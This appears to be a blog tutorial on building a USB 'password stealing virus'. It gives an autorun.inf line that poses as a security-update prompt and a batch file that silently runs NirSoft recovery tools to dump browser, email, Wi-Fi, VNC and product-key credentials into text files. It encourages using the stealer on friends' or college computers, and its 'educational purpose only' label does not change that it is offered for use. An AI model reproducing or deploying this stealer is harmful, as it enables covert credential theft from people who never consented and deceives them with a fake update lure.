How to make a password stealing virus? (educational purpose only)
Hey Wild Guns! today we are up with another post in which we are going to make a virus that will steal passwords from PC. As we all know, Windows stores most of the passwords which are used on a daily basis. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP protocols, and auto-complete passwords of many browsers like Chrome and Firefox. There exist many applications for stealing these passwords from their stored places. Using these applications and a USB pen drive we can create our own rootkit to steal passwords from your friend's computer. Now imagine this attack on your college's PC. Mza aa jayega! So let's start...
Open notepad and type the following code:
ACTION= IMPORTANT: Install security updates
Now save this notepad file and name it "autorun.inf". Make sure about the extension. It must be changed. Now we will make the "update.bat" file.
Open a new notepad and type the following code:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start PasswordFox.exe /stext passwordfox.txt
start OperaPassView.exe /stext OperaPassView.txt
start ChromePass.exe /stext ChromePass.txt
start Dialupass.exe /stext Dialupass.txt
start netpass.exe /stext netpass.txt
start WirelessKeyView.exe /stext WirelessKeyView.txt
start BulletsPassView.exe /stext BulletsPassView.txt
start VNCPassView.exe /stext VNCPassView.txt
start OpenedFilesView.exe /stext OpenedFilesView.txt
start ProduKey.exe /stext ProduKey.txt
start USBDeview.exe /stext USBDeview.txt
Now save this notepad file as update.bat
Final step: Go to http://www.nirsoft.net and download all the files that we mentioned in the code of update.bat. Note that these files should be in .exe format. Now when you have all the files ready, copy "autorun.inf, "update.bat" and the .exe files into a USB Pendrive. Now this will be our stealing tool.
Insert the pen drive into PC and the autorun window will pop up because we have created an autorun.inf. In the pop-up window, you will see the exact message that we wrote. you can change it accordingly. Now all the password stealers will silently get executed in the background. This process takes hardly a few seconds. The passwords get stored in the .txt files. Remove the pen drive and you are done. Now after verifying, you can try this stealer on your friend's PC.
Where to see stolen passwords? Simply go to my computer then to your USB drive and open it. You will see some text files, if you open them you will see the stolen usernames and passwords. Hurray!
This method doesn't work with some of the antiviruses like K7, they remove this .inf file. Hope it works for your target. BEST OF LUCK.
PLEASE UPVOTE ME AND TAKE UPVOTE BACK IN YOUR POSTS...